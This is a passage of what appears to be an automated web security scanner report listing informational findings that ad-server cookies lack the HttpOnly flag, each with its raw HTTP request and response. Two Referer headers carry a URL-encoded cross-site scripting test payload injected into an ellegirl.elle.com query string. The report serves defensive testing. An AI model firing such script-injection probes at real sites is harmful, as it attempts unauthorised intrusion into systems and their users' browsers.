Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/redir/1316277335242_138208257_as3106_imp/vew

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tase/redir/1316277335242_138208257_as3106_imp/vew?q=H4sIAAAAAAAAAFWPwWrDMAyGX0WSbVkG33XqYdeS-hHGnDW0MAYhTYYZTfsA20NP2XrZSfzSp_-Xvt6_qfV5DwREMUpAZtmZQmQSQkG3-5v53xlvKkAgCVZDp0PeYEeYPPokWj8eDUhGUNDnOrS8jwyG-9TpWk9zdghQUApwQSqEJUStmThoW7b96JiJvAuuACWHyXkuY2_GsbRr1T6jjsdHkvPihUTb_ZSX2_GyztPapk9LGs756fY6rON90aH_b_w4DDzGxAidvuR5svRgT0NEf9C5mowibK-Ryd4kCwjCQd9anW7LnNk75IMu1zHbKQaNBrng0TmRzeNyPGfPERiS_gDhxHWibQEAAA==&act=vew&idx=[0]&rnd=2035415161&no_ack=1&eventType=countOnCreative&eventOn=creative HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/3125202/PID_1715626_Parent_SkyBridge_Merchant_Dynamic_728x90_noStore.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1316277335242_138208257_as3106_imp|374#1316277335242_138208257_as3106_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|

Response

HTTP/1.1 204 No Content
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1316278453843_138362726_as3103_vew|374#1316278116134_138322589_as3104_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Thu, 15-Mar-2012 16:54:13 GMT; Path=/tase
Date: Sat, 17 Sep 2011 16:54:13 GMT

13.71. http://adserver.teracent.net/tase/redir/1316277342661_138301358_as3101_imp/vew  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/redir/1316277342661_138301358_as3101_imp/vew

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tase/redir/1316277342661_138301358_as3101_imp/vew?q=H4sIAAAAAAAAAFWPwWrDMAyGX0WSbVkG33XqYdfS-hHGnDW0MAYhTYoZTQs77bGnbN1hJ_Hp__VL-nr3ny95GtucA6FARL_XqRpGEU4eybAzZAFB2Otbq-NtnjJ7h7zX-TpkQGemwUwueHROZM04H07ZcwSGpH2XgSA6ZgouRtB-ZXSEtsEn0S6jti5vrUsUowRkls3qQSaxw9BtfjX_o_FKAQJJsBp2-lz7lreRwcinPwaPMTHCTtv9mOfb4bxM49LGD62XxwWQLIGCLrU_5afba78M99noOGWHAAWlABekQlhC1OHwmHNevJCoff3vtQKUCIF8KkNnTijtWrVm4qDfZrqS9W0BAAA=&act=vew&idx=[0]&rnd=2035422580&no_ack=1&eventType=countOnCreative&eventOn=creative HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/3125202/PID_1715626_Parent_SkyBridge_Merchant_Dynamic_728x90_noStore.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1316277342661_138301358_as3101_imp|374#1316277342661_138301358_as3101_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|

Response

HTTP/1.1 204 No Content
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1316278488979_138303797_as3106_vew|374#1316277335242_138208257_as3106_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Thu, 15-Mar-2012 16:54:48 GMT; Path=/tase
Date: Sat, 17 Sep 2011 16:54:48 GMT

13.72. http://adserver.teracent.net/tase/redir/1316277704500_138214252_as3105_imp/vew  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/redir/1316277704500_138214252_as3105_imp/vew

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tase/redir/1316277704500_138214252_as3105_imp/vew?q=H4sIAAAAAAAAAFWQwWrDMAyGX0WSbVkGX3bSqYddS-tHGHPW0MIohDQZZiTpq0_detnJfP6lT0jL9fpSM3HQtfaX_Lp99Otwn7XvMhBEx8wYPKK2Lu_thyhGCcgsOyNEJiEUdLu_zP9m_KAAgSTYGw76VvuW95HByKeD9g85OsLk0Sd55uAxJkY4aLuf87ydbus0rm381uH0bHBevJDoe57GNudgsyGiP-pUDaMIm5EMO0MWEISjfrY6bvOU2Tvko87LkM1lRYMVOdvOOZGH43a6ZM8RGJLWr-dISLYEBe0y2o3OU3YIUFAKcEEqhCVENdG_cxWg5CA478rQmcaXtlT9AaQqdOptAQAA&act=vew&idx=[0]&rnd=2035784592&no_ack=1&eventType=countOnCreative&eventOn=creative HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/3125202/PID_1715626_Parent_SkyBridge_Merchant_Dynamic_728x90_noStore.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1316277704500_138214252_as3105_imp|374#1316277704500_138214252_as3105_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|

Response

HTTP/1.1 204 No Content
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$6b15c0af7ce39e040b0650aa#|le#1316279025320_138345049_as3106_vew|374#1316277704500_138214252_as3105_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Thu, 15-Mar-2012 17:03:45 GMT; Path=/tase
Date: Sat, 17 Sep 2011 17:03:44 GMT

13.73. http://adserver.teracent.net/tase/redir/1316277704500_138372278_as3100_imp/vew  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/redir/1316277704500_138372278_as3100_imp/vew

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tase/redir/1316277704500_138372278_as3100_imp/vew?q=H4sIAAAAAAAAAFWQMW7DMAxFr0JSEkUB2jll6Fo4OkJRuTESoChgOHYgFHGy9Ga9WOk2S8f3-UH-z68P-l7rcMpPt7dhHe-LtvsxL7fDeZ2ntU2fOmQgQEeYPPokWjNx0Hp5yJACAQXtM-p4eIjOixcSfalDy8_gMSZG6B4cGSAEnzpd63HODgEKSgEuSIWwhKht2TZFx8wYPGIBSsTOcSpjbyewtGvV1zxP5gyEAhH9XudqGEXYspJhb8gCgrDX91an2zJn9g55r8t1zBbVTKOZnB1xTmTbcT6csucIDEmH_n8Obb31scIUowRklt3WGJnEQqDb_c3874w3ChBI7EUhdPoD_Sqc1m0BAAA=&act=vew&idx=[0]&rnd=2035784583&no_ack=1&eventType=countOnCreative&eventOn=creative HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/3125202/PID_1715626_Parent_SkyBridge_Merchant_Dynamic_728x90_noStore.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1316277704500_138214252_as3105_imp|374#1316277704500_138214252_as3105_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|

Response

HTTP/1.1 204 No Content
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1316279024374_138344973_as3106_vew|374#1316277342661_138301358_as3101_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Thu, 15-Mar-2012 17:03:44 GMT; Path=/tase
Date: Sat, 17 Sep 2011 17:03:43 GMT

13.74. http://adserver.teracent.net/tase/redir/1316277712246_66815854_as3102_imp/vew  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/redir/1316277712246_66815854_as3102_imp/vew

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tase/redir/1316277712246_66815854_as3102_imp/vew?q=H4sIAAAAAAAAAFWPvW7DMAyEX4XUD0UB2jll6FrYGgt0KSrHRgJ0cR27EIo4foC-dOkmSzce73j69PP58rqW4ZyebsdhHbdFhgQG0BqMDl1keU_zVJfkDTIEdK3MRWVgJg0YlZ1KYmCEVj5qmW7LnMhZpFaW65i0S0Ojhqx3aC3z3nHpz8lRAIIodTul5dZf1nla6_QtGlWEYIkIrPUhhxDBRefz2O1ouV6LvJWhpmdwGCIhNDL2D27r2LFh6RJK-XosIXoDxkvt9EYnEwJ7JOLD7iMZ1u-hPdw99-fRrjx4w3rrfSP9pi8Ox35uZOj-I0pJhrys5TQniwAZOQNlNNlgVvtOGwi0yMVGfgGz-pLEdwEAAA==&act=vew&idx=[0]&rnd=2035792327&no_ack=1&eventType=countOnCreative&eventOn=creative HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/3125202/PID_1715626_Parent_SkyBridge_Merchant_Dynamic_728x90_noStore.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1316277712246_66815854_as3102_imp|374#1316277712246_66815854_as3102_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|

Response

HTTP/1.1 204 No Content
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1316279029346_138479721_as3100_vew|374#1316277704500_138214252_as3105_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Thu, 15-Mar-2012 17:03:49 GMT; Path=/tase
Date: Sat, 17 Sep 2011 17:03:49 GMT

13.75. http://adserver.teracent.net/tase/redir/1316278116134_138322589_as3104_imp/vew  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/redir/1316278116134_138322589_as3104_imp/vew

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tase/redir/1316278116134_138322589_as3104_imp/vew?q=H4sIAAAAAAAAAFWPMW7DMAxFr0JSIiUB2jl16Fo4OkJROTYSoIvr2IVQxMl9esrSbZaOj_z_k__743Ie7i2_jMdh6XTMQICOMHn0KerY74PgJAEEINa2_h8UoETOmbZMvVm5tGvVaXjkOB99pKhveZnNyoQRAvqDLtUwJIwUKBn2hhIhIhz0vdX5ti5ZvEM56HqdsmWZaDKRY6bkhPaMy3DOXjyJB233U15vw2Vb5q3NX_paR2sFHkMShE7r5-MlSEx7k5pJWLc6nvPz7Thu033VPuPDGASA2afOFKclOwQoGAtIQSqEhYO23vItikKIjCLxaT-AQtFaonv62_nfnezEwEZkP3X6AxhtKpl4AQAA&act=vew&idx=[0]&rnd=2036202258&no_ack=1&eventType=countOnCreative&eventOn=creative HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/3125202/PID_1715626_Parent_SkyBridge_Merchant_Dynamic_728x90_noStore.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1316278116134_138322589_as3104_imp|374#1316278116134_138322589_as3104_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|

Response

HTTP/1.1 204 No Content
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1316280438322_138517596_as3104_vew|374#1316277712246_66815854_as3102_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Thu, 15-Mar-2012 17:27:18 GMT; Path=/tase
Date: Sat, 17 Sep 2011 17:27:18 GMT

13.76. http://adsfac.us/ag.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adsfac.us
Path:   /ag.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ag.asp?cc=ETN002.315724.0&source=iframe&ord=2088513037&clk=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlTQiwUs97GUoORfCML_fSCJZ25FnZW8sdXNhLHQsMTMxNjI3NjcxOTY5MCxjLDM3ODM3NCxwYyw5MDEyMCxhYywxOTY0NjIsbyxOMC1TMCxsLDcyOTAzCg--/clkurl= HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/misquincemag_us?t=1316294776909&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.misquincemag.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESE002=fpt=0%2C310408%2C311033%2C311032%2C&pct%5Fdate=4262&pctm=3&FM32614=1&FL310408=1&FL311033=1&pctl=311032&FL311032=1&FM32670=1&FM38928=1&pctc=32670&FQ=3; FSQTS044=pctl=304960&pctm=1&fpt=0%2C304960%2C&pct%5Fdate=4267&FM39385=1&pctc=39385&FL304960=1&FQ=1; UserID=983108392662652

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 4185
Content-Type: text/html
Expires: Sat, 17 Sep 2011 16:37:20 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FSETN002=pctl=315724&pctm=2&FL315724=2&pctc=39594&FQ=2&fpt=0%2C315724%2C&pct%5Fdate=4277&FM39594=2; expires=Mon, 17-Oct-2011 16:38:20 GMT; domain=.adsfac.us; path=/
Set-Cookie: FSETN002315724=uid=17417248; expires=Sun, 18-Sep-2011 16:38:20 GMT; domain=.adsfac.us; path=/
Set-Cookie: UserID=983108392662652; expires=Mon, 17-Oct-2011 16:38:20 GMT; domain=.adsfac.us; path=/
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Date: Sat, 17 Sep 2011 16:38:19 GMT
Connection: close

<html><head></head><body><script type="text/javascript">var fd_imp='http://adsfac.us/creative.asp?CreativeID=39594';var fd_clk='http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlTQiwUs97GUoORfCML_fSCJZ25FnZW8sd
...[SNIP]...
13.77. http://amch.questionmarket.com/adsc/d926534/6/43407795/decide.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d926534/6/43407795/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d926534/6/43407795/decide.php?1&noiframe=1 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: linkjumptest=1; LP=1316276716; CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1_43407814-6-1_43624044-35-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us_926534-vu@|M-0_927907-{w@|M-0

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:51:32 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Set-Cookie: CS1=deleted; expires=Fri, 17 Sep 2010 16:51:31 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1_43407799-6-1_43407795-6-1; expires=Wed, 07 Nov 2012 08:51:32 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0_926534-v"@|M-@A; expires=Wed, 07-Nov-2012 08:51:32 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 46
Content-Type: text/javascript

/* b103.dl - Sat Sep 17 00:53:10 EDT 2011 */
;
13.78. http://amch.questionmarket.com/adsc/d926534/6/43407799/decide.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d926534/6/43407799/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d926534/6/43407799/decide.php?1&noiframe=1 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270408; ST=913131_

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:54:57 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Set-Cookie: CS1=deleted; expires=Fri, 17 Sep 2010 16:54:56 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1_43407814-6-1_43624044-35-1ce587bf795690d091ae442f8_43407795-6-68_926534-1-45_43407799-6-1; expires=Wed, 07 Nov 2012 08:54:57 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us_927907-{w@|M-0_926534-[?@|M-0; expires=Wed, 07-Nov-2012 08:54:57 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 46
Content-Type: text/javascript

/* b201.dl - Sat Sep 17 00:53:10 EDT 2011 */
;
13.79. http://amch.questionmarket.com/adsc/d926534/6/43407814/decide.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d926534/6/43407814/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d926534/6/43407814/decide.php?1&noiframe=1 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us; linkjumptest=1; LP=1316276716

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:39:19 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Set-Cookie: CS1=deleted; expires=Fri, 17 Sep 2010 16:39:18 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1_43407799-6-1_926534-1-42_43407814-6-1; expires=Wed, 07 Nov 2012 08:39:19 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0_926534-v"@|M-e2; expires=Wed, 07-Nov-2012 08:39:19 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 46
Content-Type: text/javascript

/* b201.dl - Sat Sep 17 00:53:10 EDT 2011 */
;
13.80. http://amch.questionmarket.com/adsc/d927907/35/43624044/decide.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d927907/35/43624044/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d927907/35/43624044/decide.php?ord=1316295008 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/index.aspx?template=ads.ascx&topic=other&tile=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: linkjumptest=1; LP=1316276716; CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1_43407814-6-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us_926534-vu@|M-0

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:43:21 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b103.dl
Set-Cookie: CS1=deleted; expires=Fri, 17 Sep 2010 16:43:20 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1%5D%5D%3E%3E_43407814-6-82_43624044-35-1; expires=Wed, 07 Nov 2012 08:43:21 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us_927907-[)@|M-0; expires=Wed, 07-Nov-2012 08:43:21 GMT; path=/; domain=.questionmarket.com;
